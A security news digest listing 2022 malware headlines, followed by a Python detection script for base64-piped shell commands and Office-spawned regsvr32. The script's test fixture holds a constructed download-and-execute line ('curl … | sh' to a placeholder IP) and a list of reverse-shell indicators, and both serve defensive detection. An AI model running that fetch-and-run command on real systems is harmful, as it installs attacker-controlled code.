What's new around the internet

Src | Date (GMT) | Title | Description | Tags (with Stories and Notes rating where present)
SecurityAffairs | 2022-05-18 07:41:40 | Experts spotted a new variant of the UpdateAgent macOS malware dropper written in Swift (direct link) | Researchers spotted a new variant of the UpdateAgent macOS malware dropper that was employed in attacks in the wild. Researchers from the Jamf Threat Labs team uncovered the new variant, which is written in Swift and relies on AWS infrastructure to host its malicious payloads. […] | Tags: Malware, Threat
SecurityAffairs | 2022-05-17 19:10:57 | Venezuelan cardiologist accused of operating and selling Thanos ransomware (direct link) | The U.S. Justice Department accused Moises Luis Zagala Gonzalez, a 55-year-old cardiologist from Venezuela, of operating and selling the Thanos ransomware. Thanos ransomware (a.k.a. Hakbit ransomware) was developed by Nosophoros (aka Aesculapius and Nebuchadnezzar), a threat actor offering the malware for sale […] | Tags: Ransomware, Malware, Threat
SecurityAffairs | 2022-05-16 14:48:12 | Experts show how to run malware on chips of a turned-off iPhone (direct link) | Researchers devised an attack technique to tamper with the firmware and run malware on the Bluetooth chip while an iPhone is “off.” A team from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated a technique to tamper with the firmware and load malware onto a chip while an […] | Tags: Malware
SecurityAffairs | 2022-05-12 20:52:17 | New Nerbian RAT spreads via malspam campaigns using COVID-19 (direct link) | Researchers from Proofpoint discovered a new remote access trojan, named Nerbian RAT, that implements sophisticated evasion, anti-analysis and anti-reversing techniques. The malware spreads via malspam campaigns using COVID-19 and World Health Organization (WHO) themes. The name of the RAT […] | Tags: Malware | Notes: ★★
SecurityAffairs | 2022-05-09 12:17:11 | CERT-UA warns of malspam attacks distributing the Jester info stealer (direct link) | The Computer Emergency Response Team of Ukraine (CERT-UA) has detected malspam campaigns spreading an info-stealer called Jester Stealer. The malicious messages spotted by the Ukrainian CERT have the subject line “chemical attack” and contain a link to a […] | Tags: Malware | Notes: ★★★
SecurityAffairs | 2022-05-08 08:15:14 | Security Affairs newsletter Round 364 by Pierluigi Paganini (direct link) | A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. To also receive the free newsletter covering the international press, subscribe here. Raspberry Robin spreads via removable USB devices; Malware campaign hides shellcode in Windows […] | Tags: Malware
SecurityAffairs | 2022-05-07 13:24:57 | Malware campaign hides shellcode in Windows event logs (direct link) | Experts spotted a malware campaign that is the first known to hide shellcode in Windows event logs. In February 2022, researchers from Kaspersky spotted a malicious campaign using this novel technique. It allows a fileless Trojan to be hidden; the experts also […] | Tags: Malware | Notes: ★★★★
SecurityAffairs | 2022-05-06 13:28:06 | NetDooka framework distributed via a pay-per-install (PPI) malware service (direct link) | Trend Micro researchers uncovered a sophisticated malware framework, dubbed NetDooka, that is distributed via a pay-per-install (PPI) service known as PrivateLoader. It includes multiple components: a loader, a dropper, a protection driver, and a full-featured remote […] | Tags: Malware | Notes: ★★★★
SecurityAffairs | 2022-05-06 10:02:23 | Vulnerable Docker installations are a playhouse for malware attacks (direct link) | The Uptycs Threat Research team identified ongoing malicious campaigns, observed through its Docker honeypot, targeting the Docker API exposed on port 2375. The attacks deploy crypto miners and reverse shells on the vulnerable servers using base64-encoded commands on the command line, built […] | Tags: Malware, Threat
SecurityAffairs | 2022-05-04 09:58:57 | An expert shows how to stop popular ransomware samples via DLL hijacking (direct link) | Security researcher John Page (aka hyp3rlinx) discovered that malware from multiple ransomware operations, including Conti, REvil, LockBit, AvosLocker and Black Basta, is affected by DLL hijacking flaws that could be exploited to block file encryption. Page shared his findings through his […] | Tags: Ransomware, Malware
SecurityAffairs | 2022-05-03 10:56:27 | China-linked Moshen Dragon abuses security software to sideload malware (direct link) | A China-linked APT group, tracked as Moshen Dragon, has been observed abusing antivirus products to sideload ShadowPad and PlugX malware in attacks on the telecommunication sector in Central Asia, SentinelOne warns. Both PlugX and ShadowPad are very common among China-linked cyberespionage […] | Tags: Malware
SecurityAffairs | 2022-04-28 14:49:32 | Bumblebee, a new malware loader used by multiple crimeware threat actors (direct link) | Cybercriminal groups that previously used the BazaLoader and IcedID malware in their campaigns appear to have adopted a new loader called Bumblebee. The loader appears to be under active development and is highly sophisticated […] | Tags: Malware, Threat
SecurityAffairs | 2022-04-20 06:44:41 | New BotenaGo variant specifically targets Lilin security camera DVR devices (direct link) | Researchers spotted a new variant of the BotenaGo botnet malware that is considered highly evasive and currently has a zero detection rate. The BotenaGo botnet was first spotted in November 2021 by researchers at AT&T; the malicious code leverages thirty-three exploits to target millions of routers and IoT devices. BotenaGo was written in Golang (Go) and at the […] | Tags: Malware
SecurityAffairs | 2022-04-19 12:29:55 | Kaspersky releases a free decryptor for Yanluowang ransomware (direct link) | Researchers from Kaspersky discovered a flaw in the encryption process of the Yanluowang ransomware that can be exploited to recover the files encrypted by the malware without paying the ransom. The Yanluowang ransomware was […] | Tags: Ransomware, Malware, Vulnerability
SecurityAffairs | 2022-04-19 08:54:40 | New SolarMarker variant upgrades evasion abilities to avoid detection (direct link) | Researchers from Palo Alto Networks disclosed a new version of the SolarMarker malware that implements new techniques to avoid detection. SolarMarker (aka Jupyter, Polazert and Yellow Cockatoo) is a fileless .NET RAT with backdoor capabilities that allows operators to steal […] | Tags: Malware
SecurityAffairs | 2022-04-18 17:46:46 | Experts spotted Industrial Spy, a new stolen data marketplace (direct link) | A new marketplace named Industrial Spy, focused on the sale of stolen data, has appeared in the threat landscape. MalwareHunterTeam and BleepingComputer reported the birth of the marketplace, which sells stolen data and also offers free stolen data to its members. MalwareHunterTeam researchers spotted malware samples [1, 2] that drop the […] | Tags: Malware, Threat
SecurityAffairs | 2022-04-16 11:49:34 | Threat actors target the Ukrainian government with IcedID malware (direct link) | The Ukrainian Computer Emergency Response Team (CERT-UA) uncovered new phishing campaigns aimed at infecting systems of Ukrainian government agencies with the IcedID malware. The IcedID banking trojan first appeared in the threat landscape in 2017; it has capabilities similar to other financial threats […] | Tags: Malware, Threat
SecurityAffairs | 2022-04-13 14:52:23 | China-linked Hafnium APT leverages Tarrask malware to gain persistence (direct link) | The China-backed Hafnium cyberespionage group is likely behind a new piece of malware, dubbed Tarrask, used to maintain persistence on compromised Windows systems, Microsoft Threat Intelligence Center (MSTIC) experts reported. HAFNIUM primarily targets entities […] | Tags: Malware, Threat
SecurityAffairs | 2022-04-12 14:05:20 | Russia-linked Sandworm APT targets energy facilities in Ukraine with wipers (direct link) | Russia-linked Sandworm threat actors targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper. According to CERT-UA, the nation-state actors targeted high-voltage electrical substations with INDUSTROYER2, the variant analyzed by […] | Tags: Malware, Threat
SecurityAffairs | 2022-04-11 20:47:50 | FFDroider, a new information-stealing malware disguised as Telegram app (direct link) | Researchers from Zscaler ThreatLabz warn of a new Windows information-stealing malware, named FFDroider, that disguises itself as the popular instant messaging app Telegram. The malware is designed to siphon credentials and cookies from infected machines. “Recently, ThreatLabz identified a novel Windows […] | Tags: Malware
SecurityAffairs | 2022-04-07 14:56:47 | Colibri Loader employs clever persistence mechanism (direct link) | The recently discovered Colibri malware loader leverages a trivial but efficient persistence mechanism to deploy the Vidar Windows data stealer. Malwarebytes researchers observed Colibri being used to deploy Vidar in a recent campaign. The Colibri Loader first appeared in the threat landscape in August 2021 […] | Tags: Malware, Threat
SecurityAffairs | 2022-04-04 15:20:06 | Experts spotted a new Android malware while investigating Russia-linked Turla APT infrastructure (direct link) | Researchers at cybersecurity firm Lab52 discovered a new piece of Android malware while investigating infrastructure associated with the Russia-linked APT Turla. The malicious code was discovered while analyzing the Penquin-related infrastructure: the experts noticed malware contacting IP addresses […] | Tags: Malware | Notes: ★★★★
SecurityAffairs | 2022-03-31 14:00:36 | Google TAG details cyber activity with regard to the invasion of Ukraine (direct link) | The Google Threat Analysis Group (TAG) provided an update on nation-state attacks related to the ongoing Russian invasion of Ukraine; the experts spotted phishing and malware attacks targeting Eastern European and NATO countries, including Ukraine. The researchers uncovered a phishing campaign conducted by a […] | Tags: Malware
SecurityAffairs | 2022-03-23 21:43:36 | Ukrainian enterprises hit with the DoubleZero wiper (direct link) | Ukraine's CERT-UA continues to observe malware-based attacks aimed at Ukrainian organizations; in a recent alert it warned of attacks employing a wiper dubbed DoubleZero. The government CERT started observing this campaign on March 17, 2022, when threat actors launched spear-phishing […] | Tags: Malware, Threat
SecurityAffairs | 2022-03-23 12:50:03 | China-linked GIMMICK implant now targets macOS (direct link) | GIMMICK is a newly discovered macOS implant developed by the China-linked APT Storm Cloud and used to target organizations across Asia. In late 2021, Volexity researchers investigated an intrusion in an environment they were monitoring and discovered a MacBook Pro running macOS 11.6 (Big Sur) that was compromised with a previously unknown macOS malware tracked […] | Tags: Malware
SecurityAffairs | 2022-03-18 12:43:23 | Russia-linked Cyclops Blink botnet targeting ASUS routers (direct link) | The recently discovered Cyclops Blink botnet, believed to be a replacement for the VPNFilter botnet, is now targeting ASUS routers, Trend Micro researchers report. The Cyclops Blink malware has been active since at least June 2019; it targets WatchGuard Firebox and other […] | Tags: Malware | Stories: VPNFilter
SecurityAffairs | 2022-03-18 06:32:57 | (Déjà vu) Microsoft releases open-source tool for checking MikroTik routers for compromise (direct link) | Microsoft has released an open-source tool, dubbed RouterOS Scanner, that can be used to secure MikroTik routers and check for indicators of compromise associated with TrickBot malware infections. “This analysis has enabled us to develop a […] | Tags: Malware, Tool
SecurityAffairs | 2022-03-17 11:16:02 | B1txor20 Linux botnet uses DNS tunneling and a Log4j exploit (direct link) | Researchers from Qihoo 360's Netlab discovered a new backdoor used to infect Linux systems and enlist them in a botnet tracked as B1txor20; the malware exploits the Log4j vulnerability and communicates over a DNS tunnel. It was first spotted on February 9, 2022, when 360Netlab's honeypot system captured […] | Tags: Malware, Vulnerability
SecurityAffairs | 2022-03-15 05:33:53 | CaddyWiper, a new data wiper, hits Ukraine (direct link) | Experts at ESET Research Labs discovered a new data wiper, dubbed CaddyWiper, that was employed in attacks targeting Ukrainian organizations. The security firm announced the discovery of the malware in a series of tweets: “This new malware erases […] | Tags: Malware
SecurityAffairs | 2022-03-13 14:47:13 | The hidden C2: Lampion trojan release 212 is on the rise and has used the same C2 server for two years (direct link) | The Lampion trojan has been one of the most active banking trojans impacting Portuguese Internet end users since 2019. This piece of malware is known for its use of Portuguese Government Finance & Tax (Autoridade Tributária e Aduaneira) email […] | Tags: Malware
SecurityAffairs | 2022-03-12 16:40:23 | Attackers use website contact forms to spread BazarLoader malware (direct link) | Researchers from cybersecurity firm Abnormal Security observed threat actors spreading the BazarLoader/BazarBackdoor malware via website contact forms to evade detection. The TrickBot operation has recently reached the end of its journey; according to AdvIntel, some of its top members moved under the Conti ransomware gang, […] | Tags: Malware, Threat
SecurityAffairs | 2022-03-10 21:51:37 | Crooks target Ukraine's IT Army with a tainted DDoS tool (direct link) | Cisco Talos researchers uncovered a malware campaign targeting Ukraine's IT Army: threat actors are spreading password-stealing malware disguised as a DDoS tool called “Liberator.” The Liberator tool is circulating among pro-Ukraine hackers, who use it to target Russian […] | Tags: Malware, Tool, Threat
SecurityAffairs | 2022-03-07 15:46:40 | SharkBot, the new generation banking Trojan distributed via Play Store (direct link) | The SharkBot banking malware evaded Google Play Store security checks by masquerading as an antivirus app. SharkBot is a banking trojan active since October 2021 that steals banking account credentials and bypasses multi-factor authentication mechanisms. The malware was spotted at the end of October by researchers from cyber security firms […] | Tags: Malware
SecurityAffairs | 2022-03-06 13:20:00 | Security Affairs newsletter Round 356 (direct link) | A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. To also receive the free newsletter covering the international press, subscribe here. Charities and NGOs providing support in Ukraine hit by malware; Lapsus$ gang leaks data […] | Tags: Malware
SecurityAffairs | 2022-03-06 10:48:53 | Charities and NGOs providing support in Ukraine hit by malware (direct link) | Charities and non-governmental organizations (NGOs) that are currently providing support in Ukraine are being targeted by malware attacks aimed at disrupting their operations. The news was reported by Amazon, which attributes the attacks to state-sponsored hackers and confirmed that it […] | Tags: Malware
SecurityAffairs | 2022-03-01 00:12:28 | FoxBlade malware targeted Ukrainian networks hours before Russia's invasion (direct link) | The Microsoft Threat Intelligence Center (MSTIC) continues to investigate the attacks targeting Ukrainian networks and discovered that entities in Ukraine were targeted with previously undetected malware, dubbed FoxBlade, several hours before Russia's invasion. […] | Tags: Malware, Threat
SecurityAffairs | 2022-02-26 18:44:00 | Fileless SockDetour backdoor targets U.S.-based defense contractors (direct link) | Researchers from Palo Alto Networks' Unit 42 analyzed a previously undocumented custom backdoor, tracked as SockDetour, that targeted U.S.-based defense contractors. According to the experts, the SockDetour backdoor has been in the wild since at least July 2019. Unit 42 attributes […] | Tags: Malware
SecurityAffairs | 2022-02-25 06:20:44 | US and UK detail a new Python backdoor used by the MuddyWater APT group (direct link) | CISA, the FBI, US Cyber Command's Cyber National Mission Force (CNMF), the UK's National Cyber Security Centre (NCSC-UK), the NSA and law enforcement agencies have published a joint advisory on new malware used by the Iran-linked MuddyWater APT group […] | Tags: Malware
SecurityAffairs | 2022-02-24 19:28:49 | Data wiper attacks on Ukraine were planned at least since November and used ransomware as a decoy (direct link) | Experts reported that the wiper attacks that yesterday hit hundreds of systems in Ukraine used a Go-based ransomware decoy. Yesterday, researchers from cybersecurity firms ESET and Broadcom's Symantec discovered a new data wiper employed in a wave of attacks that hit hundreds of machines in Ukraine. A tweet from ESET revealed that the company's telemetry shows […] | Tags: Ransomware, Malware
SecurityAffairs | 2022-02-24 11:54:24 | New wiper malware HermeticWiper targets Ukrainian systems (direct link) | Cybersecurity experts discovered a new data wiper malware used in attacks against hundreds of machines in Ukraine. The threat of hybrid warfare is a reality: Russia-linked APT groups supported the operations of the Russian army while it prepared for the invasion. Researchers from cybersecurity firms ESET and Broadcom's Symantec discovered a new data wiper malware that was employed in […] | Tags: Malware, Threat | Notes: ★★★★★
SecurityAffairs | 2022-02-24 05:31:35 | US and UK link new Cyclops Blink malware to Russian state hackers (direct link) | US and UK cybersecurity and law enforcement agencies published a joint security advisory about a new malware, dubbed Cyclops Blink, that has been linked to the Russian-backed Sandworm APT group. Sandworm (aka BlackEnergy and TeleBots) has been active since 2000; it operates under the […] | Tags: Malware
SecurityAffairs | 2022-02-23 08:06:39 | Iranian broadcaster IRIB hit by wiper malware (direct link) | Iran's national media corporation, the Islamic Republic of Iran Broadcasting (IRIB), was hit by wiper malware in late January 2022. An investigation into the attack revealed the involvement of a disruptive wiper along with other custom-made backdoors, scripts and configuration files […] | Tags: Malware
SecurityAffairs | 2022-02-20 09:52:00 | TrickBot operation is now controlled by Conti ransomware (direct link) | The Conti ransomware group has taken over the TrickBot malware operation and plans to replace it with the BazarBackdoor malware. The TrickBot operation has reached the end of its journey; according to AdvIntel, some of its top members moved under the Conti ransomware gang, which plans to replace the popular banking Trojan with the stealthier BazarBackdoor. TrickBot is […] | Tags: Ransomware, Malware
SecurityAffairs | 2022-02-17 23:06:16 | Threat actors leverage Microsoft Teams to spread malware (direct link) | Attackers compromise Microsoft Teams accounts to attach malicious executables to chats and spread them to participants in the conversation. As the popularity of Microsoft Teams continues to grow, with roughly 270 million monthly active users, threat actors have started using it as an attack vector. Starting in January 2022, security researchers from Avanan observed attackers compromising […] | Tags: Malware, Threat
SecurityAffairs | 2022-02-17 14:52:57 | European Data Protection Supervisor calls for a ban on surveillance spyware like Pegasus (direct link) | The European Data Protection Supervisor (EDPS) authority this week called for a ban on the development and use of surveillance software like the Pegasus spyware in the EU. Pegasus is surveillance malware developed by […] | Tags: Malware
SecurityAffairs | 2022-02-16 19:29:18 | TrickBot targets customers of 60 high-profile companies (direct link) | The infamous TrickBot malware was employed in attacks against customers of 60 financial and technology companies, with new anti-analysis features. The new wave of attacks targeted cryptocurrency firms, most of them located in the U.S. TrickBot is a sophisticated, […] | Tags: Malware
SecurityAffairs | 2022-02-10 13:50:17 | Attackers increasingly adopting regsvr32 utility execution via Office documents (direct link) | The Uptycs threat research team has observed a sharp increase in the use of regsvr32.exe launched via various types of Microsoft Office documents. The full report, including Indicators of Compromise (IOCs), is available at https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents. During our analysis of these malware samples, we identified that some of them belonged to Qbot and […] | Tags: Malware, Threat | Notes: ★★★★★
SecurityAffairs | 2022-02-09 16:51:32 | (Déjà vu) Master decryption keys for Maze, Egregor, and Sekhmet ransomware leaked online (direct link) | The master decryption keys for the Maze, Egregor and Sekhmet ransomware families were released last night on the BleepingComputer forums by the alleged malware developer. The Maze group was considered one of the most prominent ransomware operations […] | Tags: Ransomware, Malware
SecurityAffairs | 2022-02-09 09:16:36 | The Pirate Bay clones target millions of users with malware and malicious ads (direct link) | CyberNews security researchers discovered five malicious domains masquerading as alternatives to The Pirate Bay. These domains were serving malicious ads to more than seven million users each month. Original post: https://cybernews.com/security/the-pirate-bay-clones-target-millions-of-users-with-malware-and-malicious-ads/ Malvertising, also known […] | Tags: Malware
SecurityAffairs | 2022-02-08 08:35:39 | Roaming Mantis SMSishing campaign now targets Europe (direct link) | The Roaming Mantis SMS phishing campaign is now targeting Android and iPhone users in Europe with malicious apps and phishing pages. Roaming Mantis surfaced in March 2018, when hacked routers in Japan were redirecting users to compromised websites. Roaming Mantis is a credential theft and malware campaign that leverages smishing to distribute malicious Android apps in the format of […] | Tags: Malware
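Two of the Uptycs items above (2022-05-06, Docker API on port 2375 abused with base64-encoded commands on the command line; 2022-02-10, regsvr32.exe launched from Microsoft Office documents) both come down to patterns that are visible in ordinary process-creation telemetry. The following Python is an added example of mine, not code from Security Affairs or Uptycs: it runs both checks over constructed sample events (the field names, host names, file paths and the 192.0.2.10 address are invented) and decodes the base64 blob so the analyst sees the actual command rather than an opaque string. The list of Office parent processes and the download/reverse-shell indicator strings are my assumptions, not something either report specifies.

```python
"""Triage process-creation events for two patterns: a base64 blob piped into
`base64 -d | sh` (the Docker API campaigns) and regsvr32.exe spawned by an
Office process (the Office-document campaigns). Added example; sample data
is constructed, not real telemetry."""
from __future__ import annotations

import base64
import binascii
import ntpath
import re
from dataclasses import dataclass

# A base64 blob (24+ chars) followed by a decode step whose output is piped into sh/bash.
B64_PIPE_RE = re.compile(
    r"([A-Za-z0-9+/]{24,}={0,2})\s*['\"]?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)
# Substrings in the decoded text that point at download-and-execute or a reverse shell
# (assumed indicator list, not one taken from the report).
SHELL_INDICATORS = ("curl ", "wget ", "/dev/tcp/", "nc ", "ncat ", "bash -i", "chmod +x")
# Office hosts that have no legitimate reason to spawn regsvr32.exe (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

_PAYLOAD = b"curl -s http://192.0.2.10/m.sh | sh"  # constructed stage-2 command (RFC 5737 address)
_CONFIG = b"log_level=debug\nretries=3\n"          # constructed benign blob

SAMPLE_EVENTS = [  # constructed events: host, parent image, image, full command line
    {"host": "docker-01", "parent_image": "/usr/bin/containerd-shim", "image": "/bin/sh",
     "cmdline": f"sh -c 'echo {base64.b64encode(_PAYLOAD).decode()} | base64 -d | sh'"},
    {"host": "docker-01", "parent_image": "/usr/bin/containerd-shim", "image": "/bin/sh",
     "cmdline": f"sh -c 'echo {base64.b64encode(_CONFIG).decode()} | base64 -d > /etc/app.conf'"},
    {"host": "ws-17", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\invoice.ocx"},
    {"host": "ws-17", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},  # benign installer
]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    host: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased final path component; ntpath accepts both '\\' and '/' separators."""
    return ntpath.basename(path).lower()


def decode_piped_base64(cmdline: str) -> list[str]:
    """Decoded text of every base64 blob in cmdline that is piped through base64 -d into a shell."""
    decoded = []
    for match in B64_PIPE_RE.finditer(cmdline):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # looked like base64 but was not; skip rather than abort the triage loop
    return decoded


def office_spawned_regsvr32(event: dict) -> bool:
    """True when an Office application is the direct parent of regsvr32.exe."""
    return basename(event["parent_image"]) in OFFICE_PARENTS and basename(event["image"]) == "regsvr32.exe"


def triage(events: list[dict]) -> list[Finding]:
    """Run both checks over the events and return findings in event order."""
    findings: list[Finding] = []
    for ev in events:
        for text in decode_piped_base64(ev["cmdline"]):
            severity = "high" if any(ind in text for ind in SHELL_INDICATORS) else "medium"
            findings.append(Finding("base64-piped-to-shell", severity, ev["host"], text.strip()))
        if office_spawned_regsvr32(ev):
            findings.append(Finding("office-spawned-regsvr32", "high", ev["host"], ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule} on {f.host}: {f.detail}")
```

In a real deployment the events would come from auditd or an EDR on the Docker hosts and from Sysmon process-creation events on the workstations; the second sample event shows why the regex insists on the trailing pipe into a shell, since base64 decoding to a file is routine. A natural follow-on check for the regsvr32 rule is whether the registered module lives under a user-writable directory such as the Temp folder in the sample, which is the case the Office-parent rule already catches here.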
Last update at: 2024-05-13 19:07:57